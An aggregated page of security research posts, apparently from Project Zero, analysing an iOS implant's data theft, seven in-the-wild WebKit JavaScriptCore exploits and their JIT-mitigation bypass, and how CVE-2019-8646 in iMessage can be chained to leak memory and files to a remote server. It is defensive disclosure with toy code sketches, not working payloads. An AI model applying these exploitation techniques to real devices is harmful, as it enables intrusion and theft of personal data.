<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "">
<plist version="1.0">
<dict>
 <key>lat</key>
 <real>45.976451000646013</real>
 <key>lng</key>
 <real>7.6585657688044914</real>
</dict>
</plist>

App contents

Various implant commands enable the attackers to steal the container directories of third-party apps. The implant contains a hardcoded list of apps which will always have their container directories uploaded when the implant starts up. The command-and-control server can also query for a list of all 3rd party apps and request uploads of their container directories.

These container directories are where most iOS apps store all their data; for example, this is where end-to-end encryption apps store unencrypted copies of all sent and received messages. 

Here's the pre-populated list of bundle identifiers for third-party apps, which will always have their container directories uploaded if the apps are installed:
If the attackers were interested in other apps installed on the device they could use a combination of the applist and app commands to get a listing of all installed app ids, then upload a particular app's container directory by id. The allapp command will upload all the container directories for all apps on the device.

Impact

The implant has access to almost all of the personal information available on the device, which it is able to upload, unencrypted, to the attacker's server. The implant binary does not persist on the device; if the phone is rebooted then the implant will not run until the device is re-exploited when the user visits a compromised site again. Given the breadth of information stolen, the attackers may nevertheless be able to maintain persistent access to various accounts and services by using the stolen authentication tokens from the keychain, even after they lose access to the device.
Category: Hacking & Security

JSC Exploits

30 August, 2019 - 01:55
Posted by Samuel Groß, Project Zero

In this post, we will take a look at the WebKit exploits used to gain an initial foothold onto the iOS device and stage the privilege escalation exploits. All exploits here achieve shellcode execution inside the sandboxed renderer process (WebContent) on iOS. Although Chrome on iOS would have also been vulnerable to these initial browser exploits, they were only used by the attacker to target Safari and iPhones.  

After some general discussion, this post first provides a short walkthrough of each of the exploited WebKit bugs and how the attackers construct a memory read/write primitive from them, followed by an overview of the techniques used to gain shellcode execution and how they bypassed existing JIT code injection mitigations, namely the “bulletproof JIT”.  

It is worth noting that none of the exploits bypassed the new, PAC-based JIT hardenings that are enabled on A12 devices. The exploit writeups are sorted by the most recent iOS version the exploit supports as indicated by a version check in the exploit code itself. If that version check was missing from the exploit, the supported version range was guessed based on the date of the fix and the previous exploits.

The renderer exploits follow common practice and first gain memory read/write capabilities, then inject shellcode into the JIT region to gain native code execution. In general it seems that every time a new bug was necessary/available, the new bug was exploited for read/write and then plugged into the existing exploit framework. The exploits for the different bugs also appear to generally use common exploit techniques, e.g. by first creating the addrof and fakeobj primitives, then faking JS objects to achieve read/write.
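
The addrof and fakeobj primitives mentioned above both rest on the same observation: the engine stores object pointers and unboxed doubles in 64-bit slots, so confusing one array type for the other reinterprets the same bits. The following is a minimal sketch of just that bit reinterpretation in Python, outside of any JavaScript engine; the function names and the example value are illustrative assumptions.

```python
import struct


def pointer_bits_as_double(address: int) -> float:
    """Reinterpret a 64-bit pointer value as an IEEE 754 double.

    This is what reading a pointer slot through an unboxed double
    array amounts to (the idea behind addrof).
    """
    return struct.unpack("<d", struct.pack("<Q", address))[0]


def double_as_pointer_bits(value: float) -> int:
    """Reinterpret a double as the 64-bit integer with the same bits.

    This is the reverse direction (the idea behind fakeobj), where a
    chosen double is later treated as a pointer.
    """
    return struct.unpack("<Q", struct.pack("<d", value))[0]


# Hypothetical user-space address, chosen only for illustration.
example_address = 0x0000000108A4C000
as_double = pointer_bits_as_double(example_address)
assert double_as_pointer_bits(as_double) == example_address
```

Typical user-space pointers have their upper 16 bits clear, so they map to very small, valid doubles and survive the round trip without hitting NaN encodings.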

For many of the exploits it is unclear whether they were originally exploited as 0day or as 1day after a fix had already shipped. It is also unknown how the attackers obtained knowledge of the vulnerabilities in the first place. Generally they could have discovered the vulnerabilities themselves or used public exploits released after a fix had shipped. Furthermore, at least for WebKit, it is often possible to extract details of a vulnerability from the public source code repository before the fix has been shipped to users. CVE-2019-8518 can be used to highlight this problem (as can many other recent vulnerabilities). The vulnerability was publicly fixed in WebKit HEAD on Feb 9 2019 with commit 4a23c92e6883. This commit contains a testcase that triggers the issue and causes an out-of-bounds access into a JSArray - a scenario that is usually easy to exploit. However, the fix only shipped to users with the release of iOS 12.2 on March 25 2019, roughly one and a half months after details about the vulnerability were public. An attacker in possession of a working exploit for an older WebKit vulnerability would likely only need a few days to replace the underlying vulnerability and thus gain the capability to exploit up-to-date devices without the need to find new vulnerabilities themselves. It is likely that this happened for at least some of the following exploits.

For comparison, here is how other browser vendors deal with this “patch-gap” or vulnerability window problem:
  • Google has this same problem with Chromium (e.g. commit 52a9e67a477b fixing CVE-2018-17463 and including a PoC trigger). However, it appears that some recent bugfix commits no longer include the JavaScript test cases. See, for example, the following two fixes for vulnerabilities reported by our team member Sergey Glazunov: aa00ee22f8f7 (for issue 1784) and 4edcc8605461 (for issue 1793). In the latter case, only a C++ test was added that tested the new behaviour without indication of how the vulnerable code could be reached.
  • Microsoft keeps security fixes in the open source Chakra engine private until the fixes have been shipped to users. The security fixes are then released and marked as such with a CVE identifier. See commit 7f0d390ad77d for an example of this. However, it should be noted that Chakra will soon be replaced by V8 (Chromium’s JavaScript engine) in Edge.
  • Mozilla appears to hold back security fixes from the public repository until somewhat close to the next release. Furthermore, the commits usually do not include the JavaScript testcases used to trigger the vulnerability.

However, it is worth noting that even if no JavaScript testcase is attached to the commit, it is often still possible to reconstruct a trigger (and ultimately an exploit) for the vulnerability from the code changes and/or commit message with moderate effort.
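
To make the size of the patch gap concrete, here is a small sketch that computes the number of days between a fix landing in WebKit HEAD and the corresponding iOS release, using only dates quoted in this post. The list layout and the helper name `patch_gap_days` are illustrative choices.

```python
from datetime import date

# (identifier, fixed in WebKit HEAD, shipped in an iOS release),
# with all dates as quoted in this post.
FIXES = [
    ("CVE-2019-8518", date(2019, 2, 9), date(2019, 3, 25)),
    ("CVE-2017-2505", date(2017, 3, 11), date(2017, 5, 15)),
    ("CVE-2017-7064", date(2017, 4, 18), date(2017, 7, 19)),
    ("CVE-2018-4442", date(2018, 10, 17), date(2018, 12, 5)),
]


def patch_gap_days(fixed_in_head: date, shipped: date) -> int:
    """Days during which the fix was public but not yet shipped."""
    return (shipped - fixed_in_head).days


for name, fixed, shipped in FIXES:
    print(f"{name}: {patch_gap_days(fixed, shipped)} days")
```

For these four entries the gap ranges from 44 to 92 days, which matches the "one and a half months" to "over three months" wording used in the text.
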

Exploit 1: iOS 10.0 until 10.3.2

This exploit targets CVE-2017-2505 which was originally reported by lokihardt as Project Zero issue 1137 and fixed in WebKit HEAD with commit 4a23c92e6883 on Mar 11th 2017. The fix was then shipped to users with the release of iOS 10.3.2 on May 15th 2017, over two months later.

Of interest, the exploit trigger is almost exactly the same as in the bug report and the regression test file in the WebKit repository. This can be seen in the following two images, the left one showing the testcase published in the WebKit code repository as part of the bugfix and the right showing the part of the in-the-wild exploit code that triggered the bug.

The bug causes an out-of-bounds write to the JSC heap with controlled data. The attackers exploit this by corrupting the first QWord of a controlled JSObject, changing its Structure ID (which associates runtime type information with a JSCell) to make it appear as a Uint32Array instead. This way, they essentially create a fake TypedArray which directly allows them to construct a memory read/write primitive.

Exploit 2: iOS 10.3 until 10.3.3

This exploit seems to target CVE-2017-7064 (or a variant thereof), which was originally discovered by lokihardt and reported as issue 1236. The bug was fixed in WebKit HEAD with commit ad6d74945b13 on Apr 18th 2017 and shipped to users with the release of iOS 10.3.3 on Jul 19th 2017, over three months later.

The bug causes uninitialized memory to be treated as the content of a JS Array. Through standard heap manipulation techniques it is possible to control the uninitialized data, at which point it becomes possible to construct the well-known addrof and fakeobj primitives through a type confusion between doubles and JSValues and thus gain memory read/write by constructing a fake TypedArray.

Exploit 3: likely iOS 11.0 until 11.3

This exploit targets the WebKit bug 181867 which might be CVE-2018-4122. It was fixed in WebKit HEAD on Jan 19, 2018 and presumably shipped to users with the release of iOS 11.3 on Mar 29th 2018.

The bug is a classic (by 2019 standards) JIT side-effect modelling issue. It remains unclear whether the attackers knew about this bug class before it started to be widely known around the beginning of 2018. The exploit again constructs the addrof and fakeobj primitives by confusing unboxed double and JSValue arrays, then gains memory read/write by again faking a typed array object.

Exploit 4: likely iOS 11.3 until 11.4.1

This exploit targets the bug fixed in commit b4e567d371fd on May 16th 2018 and corresponding to WebKit issue 185694. Unfortunately, we were unable to determine the CVE assigned to this issue, but it seems likely that the fix shipped to users with the release of iOS 11.4.1 on Jul 9th 2018.

This is another JIT side-effect modelling bug with a similar exploit to the previous one, again constructing the fakeobj primitive to fake JS objects. However, by now the Gigacage mitigation had shipped. As such it was no longer useful to construct fake ArrayBuffers/TypedArrays. Instead, the exploit constructs a fake unboxed double Array and with that gains an initial, somewhat limited memory read/write primitive. It then appears to use that initial primitive to disable the Gigacage mitigation and then continues to abuse TypedArrays to perform the rest of the exploit work.

Exploit 5: iOS 11.4.1

This exploit targets CVE-2018-4438, which was first reported by lokihardt as issue 1649. The bug was fixed with commit 8deb8bd96f4a on Oct 26th 2018 and shipped to users with the release of iOS 12.1.1 on Dec 5th 2018.

Due to the bug, it was possible to construct an Array with a Proxy prototype that wasn’t expected by the engine. It is then possible to turn this bug into an incorrect side-effect modelling issue by performing effectful changes during a proxy trap triggered (unexpectedly) in JIT compiled code. The exploit is then very similar to the previous one, first disabling the Gigacage with the limited JS Array read/write, then performing the shellcode injection with a full read/write via TypedArrays.

Exploit 6: likely iOS 12.0 until 12.1.1

This exploit targets CVE-2018-4442, which was originally discovered by lokihardt and reported as issue 1699 and fixed in HEAD with commit 1f1683cea15c on Oct 17th 2018. The fix then shipped to users with the release of iOS 12.1.1 on Dec 5th 2018.

In contrast to the other bugs, this bug yields a use-after-free in the JavaScriptEngine. Similar to the PoC in the WebKit tracker, the attackers abuse the UaF by freeing the property backing storage of an object (the butterfly), then reclaim that storage with a JSBoundFunction’s m_boundArgs array by repeatedly calling func.bind(). If that is successful, the attackers are now able to get access to an internal object, m_boundArgs, by loading a property from the freed object’s butterfly. With that, it becomes possible to construct an OOB access by making the m_boundArgs array sparse, then calling the bound function. This will invoke JSBoundFunction::boundArgsCopy which assumes that m_boundArgs is dense and otherwise reads JSValues past the end of a buffer which it passes as argument to a controlled function (that was bound() previously).

This fact has been exploited in the past, which is why there is now a comment next to the definition of m_boundArgs: `// DO NOT allow this array to be mutated!`. From there, the attackers again construct the addrof and fakeobj primitives and reuse the rest of the exploit from before.

Exploit 7: iOS 12.1.1 until 12.1.3

The final exploit targets the same bug as the one exploited by Linus Henze, which is again a JIT side-effect modelling issue. The WebKit bugtracker id for it appears to be 191731. It is unclear whether a CVE number was assigned to it, but it could be CVE-2019-6217 which was disclosed during mobile Pwn2Own that year by Team Fluoroacetate. The bug seems to have been fixed on Nov 16th 2018 and shipped to users with the release of iOS 12.1.3 on Jan 22nd 2019.

Instead of using WASM objects to gain memory read/write as Linus does, the attackers appear to have plugged the new bug into their old exploit and again create a fake JS Array to gain initial memory read/write capabilities, then continue the same way they did before.

Shellcode Execution

After gaining memory read/write capabilities, the renderer exploit pivots to shellcode execution, which then performs the privilege escalation exploits. The way they achieve shellcode execution is the same in all exploits: by bypassing the JIT mitigations to overwrite an existing function’s JIT code and then invoking that function.

For some time now (first announced by Apple at BlackHat 2016 and then shipped with iOS 10), iOS features a JIT hardening measure that aims to make it more difficult for an attacker to write code directly into the RWX JIT region. It basically achieves that by creating a second, “hidden” mapping of the JIT region that is writable and keeping the first mapping of the region non-writable. However, one weakness of this approach, and acknowledged in the presentation by Apple, is that there has to be a “jit_memcpy” function that is called to copy the generated code into the JIT region. As such, it remains viable to perform a ROP or JOP style attack to execute this function with controlled shellcode as argument. This is what the attackers do as well. This problem now appears to be somewhat mitigated on PAC enabled devices by signing the JIT code during code generation and verifying the signature later on. The exploits we found did not include a bypass for PAC enabled devices and instead bailed out if they ran on an A12 device.
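
The dual-mapping idea can be illustrated outside of iOS with two views of the same backing memory, one read-only and one writable. The sketch below is only an analogy and not Apple's implementation: it assumes a POSIX-like system, uses a temporary file as the shared backing store, and the function name `dual_mapping_demo` is hypothetical. It shows why any code that can reach the writable view (the role "jit_memcpy" plays) can change what is seen through the non-writable view.

```python
import mmap
import tempfile


def dual_mapping_demo(payload: bytes, size: int = mmap.PAGESIZE) -> bytes:
    """Write through a writable view and read the bytes back through a
    separate read-only view of the same backing pages."""
    with tempfile.TemporaryFile() as backing:
        backing.truncate(size)
        # First mapping: stands in for the non-writable JIT region.
        read_only = mmap.mmap(backing.fileno(), size, access=mmap.ACCESS_READ)
        # Second mapping: stands in for the "hidden" writable alias.
        writable = mmap.mmap(backing.fileno(), size, access=mmap.ACCESS_WRITE)
        try:
            writable[:len(payload)] = payload
            return read_only[:len(payload)]
        finally:
            read_only.close()
            writable.close()
```

Writing directly through `read_only` would raise an error, so the protection holds only as long as the address of the writable alias and the copy routine that uses it stay out of the attacker's reach.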

In more detail, the attackers construct a JOP chain, consisting of three different gadgets that allow them to perform a function call of an arbitrary function with controlled arguments. To kick off the chain, they replace the native function pointer of the `escape` JS function with the first gadget of the chain. The chain then performs a call to the “jit_memcpy” function to overwrite the JIT code of a previously compiled function with the shellcode. Finally they replace the function pointer of `escape` one last time and point it to the shellcode inside the JIT region.
Category: Hacking & Security

The Many Possibilities of CVE-2019-8646

22 August, 2019 - 21:49
Posted by Natalie Silvanovich, Project Zero
CVE-2019-8646 is a somewhat unusual vulnerability I reported in iMessage. It has a number of consequences, including information leakage and the ability to remotely read files on a device. This blog post discusses the ways that an attacker could use this bug. It is a good example of how the large number of classes available for NSKeyedArchiver deserialization can make a bug more versatile. It’s also a good example of how minor functional bugs can make a vulnerability more useful. 

Please note that this blog post assumes some familiarity with NSKeyedArchiver deserialization. If you haven’t read our general post on iMessage, I’d recommend reading that first.

The Bug

The bug described in CVE-2019-8646 is that an unsafe class, _NSDataFileBackedFuture, can be deserialized by iMessage in a remote context. It was introduced in iOS 12.1. This class is a subclass of NSData that initializes a buffer with the contents of a file at the time the buffer is used. When this class is deserialized, it decodes the length of the buffer, a string file name and a few other objects. It then initializes the instance with the length and filename. Then when [_NSDataFileBackedFuture length] is called, it returns the deserialized length. When [_NSDataFileBackedFuture bytes] is called, the file is opened and loaded into a buffer in memory, and the buffer is returned. The buffer is also cached for future calls to the method.

There are two immediate problems with being able to deserialize this class in an untrusted context. One is that it has the potential to allow a process to access a file that it is not authorized to access, because the process doing the deserialization is the one that loads the file. When I reported this bug, I thought that this was more likely to be a concern for deserialization that occurs locally via IPC as opposed to deserialization that occurs on a remote target like iMessage. The second is that this class violates one of the guarantees that the NSData class makes, that the length property will always return the length of the bytes property. This is because the length of the buffer returned by [_NSDataFileBackedFuture bytes] is the length of the loaded file, and has no relationship to the deserialized length returned by [_NSDataFileBackedFuture length].
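
The second problem can be made concrete with a toy model. The sketch below is written in Python and is not Apple's code: `FileBackedData`, `naive_copy` and the flat `heap` bytearray are hypothetical stand-ins, used only to show what happens when a consumer trusts a declared length that is unrelated to the bytes actually loaded.

```python
class FileBackedData:
    """Toy stand-in for a data object whose length is decoded
    separately from the contents it later loads."""

    def __init__(self, declared_length: int, contents: bytes):
        self.declared_length = declared_length
        self._contents = contents

    def length(self) -> int:
        # Returns the deserialized value, whatever the contents are.
        return self.declared_length

    def bytes_(self) -> bytes:
        # Returns the contents that were actually loaded.
        return self._contents


def violates_length_guarantee(data: FileBackedData) -> bool:
    """True when length() disagrees with the size of bytes_()."""
    return data.length() != len(data.bytes_())


def naive_copy(heap: bytearray, offset: int, data: FileBackedData) -> bytes:
    """Model a consumer that places the loaded bytes in a flat 'heap'
    and then reads length() bytes back, as code trusting the length
    property would."""
    payload = data.bytes_()
    heap[offset:offset + len(payload)] = payload
    return bytes(heap[offset:offset + data.length()])
```

With a heap that already holds other data next to the buffer, a declared length larger than the contents makes `naive_copy` return the neighbouring bytes as well, which is the shape of the out-of-bounds read in the original proof-of-concept.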

The original proof-of-concept (PoC) attached to the bug report is a simple out-of-bounds read. The payload includes a serialized instance of class ACZeroingString, which is a subclass of NSString. Its initWithCoder method deserializes an instance of class NSData, as well as a length that must be half the [NSData length] that it uses to initialize the contents of the string. If the NSData instance is of subclass _NSDataFileBackedFuture, the length property of the instance can be longer than its internal data, causing the PoC to return a string that contains the contents of unallocated memory, or cause a crash.

Accessing a Remote URL

At this point, this bug didn’t seem that useful for a remote attack, so I wondered if it would be possible for it to access a remote URL instead of a local file. The URL is accessed by calling [NSData initWithContentsOfURL:options:error:], which can initialize a buffer from any type of URL, including HTTP URLs. However, the _NSDataFileBackedFuture class contains some checks to prevent this.

There are no checks on the URL at initialization, but there are some checks when the URL is accessed in [_NSDataFileBackedFuture fileURL]. Specifically, it calls [NSURL path] on the URL, and then calls [NSFileManager fileExistsAtPath:] on that path. This does not check that the URL is a file URL before checking the path. So it is possible to bypass this check by using a URL that has a path component that resolves to an existing file. I used:

A URL with Unprintable Characters

The ability to make a request to a URL created an interesting possibility. Maybe it was possible to use the URL to leak data remotely. Since the original PoC created a string that contained leaked data, and the NSURL class is deserialized using a string, it didn’t seem like it would be that difficult. It turned out there was a problem using the NSURL class though. An NSURL instance has very strict limitations on the characters it can contain. This class is mostly open-source, so the exact limitations can be seen in the _CFStringIsLegalURLString method. This is a very robust method, and I did not find any ways to get around the limitations. I did notice that after the method succeeds, the method _CFURLInit is called, which calls CFStringCreateCopy on the input string, so it caches a copy of the validated string to use as the URL later.

One idea I had was to change the string after the URL was created, because the URL string is only validated once. In the absence of bugs, this shouldn’t be possible. CFStringCreateCopy calls [NSString copy] on most string objects, and for a mutable string, this should copy the string, so that any future changes to the string do not affect the copy. For a non-mutable string, it sometimes just increases the retain count on the string, but that also shouldn’t be a problem, because the contents of an immutable string can’t change.

I looked through the subclasses of NSString that can be deserialized in iMessage to see if there were any that didn’t follow the mutable copy rules described above. There were a few, but the most promising was the class INDeferredLocalizedString. This class is technically immutable (in that it extends NSString instead of NSMutableString), and it implements copy by adding a reference. But the value of an INDeferredLocalizedString instance can change. Its deserialization implementation in pseudocode is as follows.

INDeferredLocalizedString *__cdecl -[INDeferredLocalizedString initWithCoder:](INDeferredLocalizedString *self, id decoder)
{
  self->_formatKey = [decoder decodeObjectOfClass:[NSString class] forKey:@"_formatKey"];
  self->_table = [decoder decodeObjectOfClass:[NSString class] forKey:@"_table"];
  self->_arguments = [decoder decodeObjectOfClasses:@[[NSString class], [NSArray class]] forKey:@"_arguments"];
  self->_bundleIdentifier = [decoder decodeObjectOfClass:[NSString class] forKey:@"_bundleIdentifier"];
  self->_bundleURL = [decoder decodeObjectOfClass:[NSURL class] forKey:@"_bundleURL"];
  self->_cachedLocalization = [decoder decodeObjectOfClass:[NSString class] forKey:@"_cachedLocalization"];
  return self;
}

It deserializes many properties, including a bundle URL that can be used for localization, a format string with a corresponding array of localized strings and a cached string. When an INDeferredLocalizedString instance is accessed, its value is determined by calling [INDeferredLocalizedString localizeForLanguage:], which generates the string based on these values and the device’s language settings. The deserialized properties have a precedence. For example, the class would prefer to fetch a string from a bundle as opposed to generating it from the format string.

Even with these properties, the string would only change if the device’s language changed. However, it is possible to make the string change due to the issues with cycling in NSKeyedArchiver deserialization described in this post. The highest precedence property of the class, the _cachedLocalization string, is deserialized last, while a lower precedence property, _formatKey, is deserialized earlier. The bundle URL is deserialized in the middle of these two. So if an instance of class INDeferredLocalizedString has a valid _formatKey, and then the bundle URL’s string is a reference to the string itself, the URL will validate the _formatKey when it is being created. Initialization of the INDeferredLocalizedString instance will then continue, and the _cachedLocalization string will be deserialized and set as a property. After the INDeferredLocalizedString deserialization is complete, the URL will be available in the NSKeyedUnarchiver decoder’s cache. When another class, such as _NSDataFileBackedFuture, uses it, the string value will now be generated based on the _cachedLocalization property, which is the unvalidated string.
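
The ordering trick above is a validate-once, use-later problem. The following toy model in Python is a sketch of that logic only: the classes `DeferredString` and `Url`, the simplified `LEGAL_URL` pattern and the helper `build_unvalidated_url` are all hypothetical stand-ins and do not reflect the real Foundation implementations.

```python
import re

# Simplified stand-in for the real URL character check.
LEGAL_URL = re.compile(r"^[A-Za-z0-9:/._?=&%-]*$")


class DeferredString:
    """Toy string whose value depends on which properties are set."""

    def __init__(self, format_key: str):
        self.format_key = format_key
        self.cached_localization = None  # highest precedence once set

    def value(self) -> str:
        if self.cached_localization is not None:
            return self.cached_localization
        return self.format_key


class Url:
    """Validates its string once, then keeps a reference, not a copy."""

    def __init__(self, string: DeferredString):
        if not LEGAL_URL.match(string.value()):
            raise ValueError("illegal URL string")
        self._string = string  # a 'copy' that only adds a reference

    def absolute_string(self) -> str:
        return self._string.value()


def build_unvalidated_url(valid: str, unvalidated: str) -> Url:
    """Replay the decode order: format key, then URL, then cached value."""
    s = DeferredString(valid)            # lower-precedence property first
    url = Url(s)                         # validation sees only the valid value
    s.cached_localization = unvalidated  # decoded last, wins from now on
    return url
```

Calling `build_unvalidated_url("http://example.com/", "http://example.com/\x01")` returns a `Url` whose string contains a character the validator would have rejected, because the check ran before the higher-precedence property existed.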

This behavior allowed me to create a message that would leak memory and send it to a remote server as a URL parameter. A sample message with this behavior is available here. That said, the parameter is only read up to the first null character, so this PoC usually only sends a few bytes. This is probably enough to leak a single pointer to break ASLR with enough tries, but not good for much else.

Concatenating and Encoding Leaked Data

This limitation also prevents a more interesting attack: remotely leaking a file. Since the _NSDataFileBackedFuture class can load a file into a buffer, and also send the contents to a remote URL, this is a possible attack, but the prevalence of null characters in file format headers limits its usefulness.

There is also a more subtle problem preventing the PoC above from being immediately repurposed to leak a file. The PoC works by creating a _NSDataFileBackedFuture instance with contents that are smaller than its length, then using that instance to create an ACZeroingString instance, which in a roundabout way becomes the string of a URL. That URL is then used as the URL of another _NSDataFileBackedFuture instance. But what is the string value of the URL of the first _NSDataFileBackedFuture instance? I used another remote URL which responded with a buffer containing another partial URL. So when the _NSDataFileBackedFuture buffer is read out of bounds when creating the ACZeroingString instance, the leaked data continues the URL. This is not possible when accessing a file with _NSDataFileBackedFuture, because the file contents are set and generally are not in the format of a URL. So in order to leak a file, I also need to be able to concatenate strings.

The INDeferredLocalizedString class has functionality that is helpful in getting around both of these limitations. Two properties that can be decoded during deserialization are the string _formatKey and an array of strings, _arguments. If an INDeferredLocalizedString instance has only these properties, it will generate its value using the first property as a format string, and the second property as its parameters.

(You might be wondering at this point whether this behaviour is a vulnerability in itself because an attacker can control both a format string and its parameters. It’s not, because the class uses a ‘fake’ format string implementation that is based on regular expressions. The implementation searches for instances of “%@” or similar in the format string, and then replaces them sequentially with values from the array).
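
A regular-expression-based substitution of this kind can be sketched in a few lines. The Python below is an illustration of the general technique, not a reconstruction of the real implementation: the function name `fake_format` is hypothetical, only the “%@” placeholder is handled, and `str()` stands in for whatever per-argument conversion the real code performs.

```python
import re

PLACEHOLDER = re.compile(r"%@")


def fake_format(format_key: str, arguments: list) -> str:
    """Replace each "%@" in turn with the next argument.

    No other format specifier is interpreted, which is why attacker
    control over the format string is not a format string bug here.
    """
    remaining = iter(arguments)

    def substitute(match):
        try:
            return str(next(remaining))
        except StopIteration:
            # Fewer arguments than placeholders: leave the rest as-is.
            return match.group(0)

    return PLACEHOLDER.sub(substitute, format_key)
```

Because the replacement text is never rescanned and specifiers such as "%n" are left untouched, the worst an attacker can do with this primitive is concatenate strings, which is exactly the capability the attack needs.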

This format string behaviour allows the ACZeroingString instance to be inserted into a string containing a URL, and it also helps with the issue of null characters. When an ACZeroingString instance is formatted with “%@”, non-printable characters are escaped in the format “\UXXXX”. Single null bytes will be added to the string as a part of a character in this way; however, if there are two null bytes in a row, this character will be omitted. This type of encoding is useful in some contexts (for example, leaking the SMS database, where there are a lot of null characters, but only the strings are relevant), but is not enough to completely leak a full file.

Looking at the ‘fake’ format string function a bit more, it calls description on every member of the arguments array before inserting it into the format string. This would be very useful behavior if the arguments array wasn’t limited to containing string types. Calling description on an instance of class NSURL URL-encodes the URL string before it is inserted. So if it was possible to put the URL containing the leaked bytes into the arguments array, it could be encoded, which would allow the entire file to be sent as a part of a URL.

There is a problem in NSKeyedUnarchiver deserialization which can allow objects that are not included in the allow list to be returned when an instance of class NSArray or NSDictionary is deserialized. The first time an array or dictionary is deserialized, every element, key or value that is deserialized as a part of the object’s contents is checked against the allow list. But if the object has already been deserialized, the object is returned from the NSKeyedUnarchiver instance’s object cache, and only the object, and not its elements, keys or values, is checked against the allow list. So the _arguments array could contain a URL, so long as the array had already been deserialized elsewhere.
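
The cache behaviour described above can be modelled with a toy decoder. The Python sketch below is a simplified illustration under stated assumptions, not the real unarchiver: `ToyDecoder`, the `Url` class and the archive layout (a dictionary from uid to a class name and payload) are all hypothetical.

```python
class Url(str):
    """Stand-in for a class that a strict allow list would reject."""


class ToyDecoder:
    def __init__(self, archive: dict):
        self.archive = archive  # uid -> (class name, payload)
        self.cache = {}         # uid -> already-decoded object

    def decode(self, uid: int, allowed: set):
        if uid in self.cache:
            obj = self.cache[uid]
            # Cache hit: only the container's own class is checked,
            # not the classes of the elements inside it.
            self._check(type(obj).__name__, allowed)
            return obj
        class_name, payload = self.archive[uid]
        self._check(class_name, allowed)
        if class_name == "list":
            # First decode: every element is checked against the list.
            obj = [self.decode(child, allowed) for child in payload]
        else:
            obj = payload
        self.cache[uid] = obj
        return obj

    @staticmethod
    def _check(class_name: str, allowed: set) -> None:
        if class_name not in allowed:
            raise TypeError(f"{class_name} is not in the allow list")
```

Decoding the same list first in a context that allows `Url` and then in a context that does not returns the cached list, `Url` element included, whereas a fresh decoder in the strict context raises an error. Re-validating the contents on a cache hit would close the gap in this model.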

It was a bit of a challenge finding somewhere an array containing a URL could be deserialized in iMessage. The top level allow list does not include class NSArray, and I could not find a class with an initWithCoder: implementation that contained a deserialization call that allows both arrays and URLs. I eventually implemented it so that it uses the bug twice. First, a dictionary containing the URL is decoded, which is allowed at the top level. Then, an instance of __NSLocalizedString is decoded, which decodes a property NS.configDict, which allows arrays and dictionaries, but not URLs, but because of the bug, a dictionary containing a URL is okay. Then, the bug is used again when initializing the _arguments array of the INDeferredLocalizedString instance, which is allowed because it only checks that the referenced array is an instance of NSArray. When this object is formatted into a string, it will contain some extra characters due to the dictionary, but otherwise will still be encoded.

Leaking a File

Putting this all together allowed for a file to be read remotely from an iPhone. There are a few limitations to this attack. First, it is very memory intensive, the largest memory hog being the ‘fake’ format string function that needs to handle a very long string. SpringBoard can crash due to memory limits if the file is too long. The limit appears to be around 40kB to 100kB depending on device memory, though it’s likely this could be increased with enough effort. It is possible to fetch the beginning of a larger file within this limit, and also reduce memory usage a bit by using escape (“\U”) encoding instead of URL encoding in situations where stripping null characters is okay.

The encoding of the URL returned to the remote server is also quite complex. The URL is escaped for a few characters up until the end of where the URL scheme would be, and then it moves into URL encoding. The URL encoding is also escaped though, so it needs to be unescaped before it is URL decoded. The escaped characters are in UTF-16 while the URL encoded characters are in UTF-8, complicating matters. Then there can be a third section of the URL that is just escaped, which occurs because when the valid characters are switched for the invalid characters when creating the URL it retains the length of the valid characters. If the URL is too short, the extra characters will only be escaped.
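
The two decoding layers can be sketched as follows. This is not the author's script: it is a minimal Python illustration that assumes every escape has exactly the form “\UXXXX” with four hexadecimal digits, that the fragment is otherwise plain text, and that surrogate pairs and the three-section layout described above can be ignored. The names `unescape` and `decode_leak` are hypothetical.

```python
import re
from urllib.parse import unquote_to_bytes

# Matches a literal backslash, a capital U and four hex digits.
ESCAPE = re.compile(r"\\U([0-9A-Fa-f]{4})")


def unescape(text: str) -> str:
    """Replace each escape with the UTF-16 code unit it names."""
    return ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def decode_leak(fragment: str) -> bytes:
    """Unescape first, then URL-decode, in the order described above."""
    return unquote_to_bytes(unescape(fragment))
```

For example, a fragment in which each percent sign arrives escaped as “\U0025” is first turned back into ordinary percent-encoding and only then decoded to raw bytes. A real decoder would also need to handle the sections that are escaped but not URL-encoded.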

There’s another problem with encoding, which is that sometimes printable characters are duplicated in the URL encoded string. It’s not clear why this happens; it could be a bug in [NSURL description] or the URL encoder. It is fairly easy to programmatically recognize and correct these duplications, but there is always the possibility that a file contains these exact patterns, in which case the file could be read with errors. A python script that decodes all the iterations of encoding in a returned URL and outputs a file is available here. I have not seen any files that contain errors after being processed with this script, but there is a small probability that this could occur.

The following video shows this vulnerability being used to access a photo from a remote device’s memory. First the sms.db file is accessed to get the URL of the photo, and then the photo is accessed.

Conclusion

CVE-2019-8646 is a vulnerability in iMessage that can allow memory to be leaked and files to be read remotely from a device. The bug was fixed on July 23, 2019. This fix requires the class to be explicitly allowed for deserialization, as opposed to being allowed in any situation that permits NSData deserialization.

There were several factors that caused this bug to be exploitable in this way. One is the large number of classes available for deserialization in SpringBoard. Without the ACZeroingString, INDeferredLocalizedString and __NSLocalizedString classes being available, this bug would be less useful to an attacker.

Also, there were three small bugs that contributed to this bug’s capabilities. First, the error in [INDeferredLocalizedString copy] is a bug that would usually just lead to occasional crashes when the device’s language was changed, but in this situation, it turned out to be exactly the bug that was needed to circumvent the character restrictions of the NSURL class. Likewise, the error in NSKeyedUnarchiver that allows arrays and dictionaries containing any type of object to be returned if they are already decoded would usually only cause exceptions related to typing, but in this case allows for a URL to be encoded. Finally, the ability of the _NSDataFileBackedFuture class to access remote URLs was also a small bug in URL filtering. This shows that there is a security benefit to avoiding and fixing bugs, even if they don’t have an obvious security impact. Alone, none of these bugs, including the vulnerability, were that serious, but together they allow a user’s data to be accessed remotely.
Category: Hacking & Security